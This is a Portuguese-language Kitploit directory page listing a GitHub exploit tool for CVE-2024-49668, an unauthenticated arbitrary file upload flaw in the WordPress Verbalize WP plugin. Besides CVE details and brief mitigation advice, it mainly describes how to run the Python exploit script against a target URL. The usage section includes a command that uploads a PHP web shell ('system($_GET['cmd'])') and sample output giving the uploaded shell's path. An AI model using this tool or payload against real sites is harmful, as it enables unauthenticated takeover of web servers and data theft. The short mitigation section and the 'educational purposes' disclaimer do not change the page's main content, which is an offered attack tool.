Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-49668 — Plugin WordPress Verbalize WP <= 1.0 - Vulnerabilidade de upload arbitrário de arquivos | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2024-49668
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubnxploited/cve-2024-49668

CVE-2024-49668

Plugin WordPress Verbalize WP <= 1.0 - Vulnerabilidade de upload arbitrário de arquivos

Ver Repositório
2há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚨 CVE-2024-49668: Vulnerabilidade de Upload Arbitrário de Arquivos no Plugin Verbalize WP do WordPress

📋 Visão Geral

CVE-2024-49668 é uma vulnerabilidade crítica no plugin Verbalize WP do WordPress, versões 1.0 e anteriores. Esta vulnerabilidade permite que atacantes não autenticados enviem arquivos arbitrários, incluindo web shells, para o servidor web. O problema ocorre devido à validação de entrada insuficiente e a restrições inadequadas de tipos de arquivo durante o upload.

Detalhes

  • Publicado: 2024-10-23
  • Atualizado: 2024-10-23
  • Título: Plugin Verbalize WP do WordPress <= 1.0 - Vulnerabilidade de Upload Arbitrário de Arquivos
  • Descrição: Vulnerabilidade de Upload Irrestrito de Arquivo com Tipo Perigoso no Admin Verbalize WP, permitindo o upload de uma web shell para um servidor web. Este problema afeta o Verbalize WP de n/a até 1.0.
  • CWE: CWE-434: Upload Irrestrito de Arquivo com Tipo Perigoso
  • Pontuação CVSS: 10.0 (Crítico)
  • String do Vetor: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

🛠️ Script de Exploração

Este script Python explora a vulnerabilidade CVE-2024-49668 para enviar um arquivo shell para o site WordPress alvo usando o plugin Verbalize WP.

Funcionalidades

  • Verificação Automatizada de Vulnerabilidade: O script verifica se o site alvo é vulnerável checando a versão do plugin em readme.txt.
  • Upload de Arquivo: Envia um arquivo shell PHP para o site alvo.
  • Extração de Caminho: Extrai e exibe o caminho completo do arquivo shell enviado.

🧰 Requisitos

  • Python 3.x
  • Biblioteca requests

Instale a biblioteca necessária usando o pip:

root@kitploit:~
pip install requests

🚀 Uso

root@kitploit:~
usage: 
CVE-2024-49668.py [-h] -u URL [-s SHELL]

Execute a POST request to a WordPress site.

options:
  -h, --help         show this help message and exit
  -u, --url URL      Target URL
  -s, --shell SHELL  Shell code to upload

Exemplo

Por padrão, o script enviará um shell PHP que executa phpinfo().

root@kitploit:~
python CVE-2024-49668.py -u http://target.com

Você também pode especificar um código de shell PHP personalizado para ser enviado:

root@kitploit:~
python CVE-2024-49668.py -u http://target.com -s "<?php system($_GET['cmd']); ?>"

📄 Saída do Script

root@kitploit:~
The site is vulnerable. Exploiting version: 1.0. Uploading file...
Shell path: /wp-content/uploads/audio-text/4091/audio-demo.php
Exploit By: Nxploit, Khaled ALenazi

📚 Informações Adicionais

Impacto da Vulnerabilidade

A vulnerabilidade CVE-2024-49668 permite que atacantes obtenham controle total sobre o servidor alvo ao enviar arquivos maliciosos. Explorar esta vulnerabilidade pode levar a consequências graves, incluindo violações de dados, acesso não autorizado e possível desfiguração do site.

Boas Práticas para Mitigação

Para proteger seu site WordPress desta vulnerabilidade, é recomendado:

  • Atualizar o plugin Verbalize WP para a versão mais recente que corrige este problema.
  • Implementar validações robustas de upload de arquivos para restringir tipos e tamanhos de arquivos.
  • Monitorar regularmente os logs do seu servidor para detectar atividades suspeitas.

Aviso Legal

Esta ferramenta destina-se apenas a fins educacionais. O uso não autorizado desta ferramenta contra sites sem permissão explícita do proprietário é ilegal. Os autores não são responsáveis por qualquer uso indevido ou dano causado por esta ferramenta.


Criado em 2025-03-22 por Nxploited , Khaled alenazi

Baixar ferramenta